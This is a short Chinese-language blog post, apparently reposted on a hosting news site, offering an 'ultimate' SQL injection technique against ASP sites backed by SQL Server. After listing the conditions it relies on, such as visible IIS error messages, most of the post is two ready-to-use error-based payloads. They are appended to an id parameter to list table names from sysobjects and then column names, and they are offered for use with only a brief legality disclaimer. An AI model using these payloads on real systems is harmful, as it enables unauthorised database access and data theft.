SQLSERVER注入必殺技-ASP教程,安全加密

2006-07-15 分类：ASP 阅读(483) 评论(0)

必殺技成功條件：

1.找到注入點

2.數據庫為sqlserver

3.iis沒屏蔽錯誤提示

注：因必殺技是我研究n久的心得，經多次改良，成功率極高。請不要用於不合法用途上，否則後果自負。

[n] = 第n個表

id=1 and (select top 1 name from(select top [n] id,name from sysobjects where xtype=char(85)) t order by id desc)>1

[t] = 表名

[n] = 第n個字段

id=1 and (select top 1 col_name(object_id([t]),[n]) from sysobjects)>1

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com 特别注意：本站所有转载文章言论不代表本站观点！本站所提供的图片等素材，版权归原作者所有，如需使用，请与原作者联系。未经允许不得转载：IDC资讯中心 » SQLSERVER注入必殺技-ASP教程,安全加密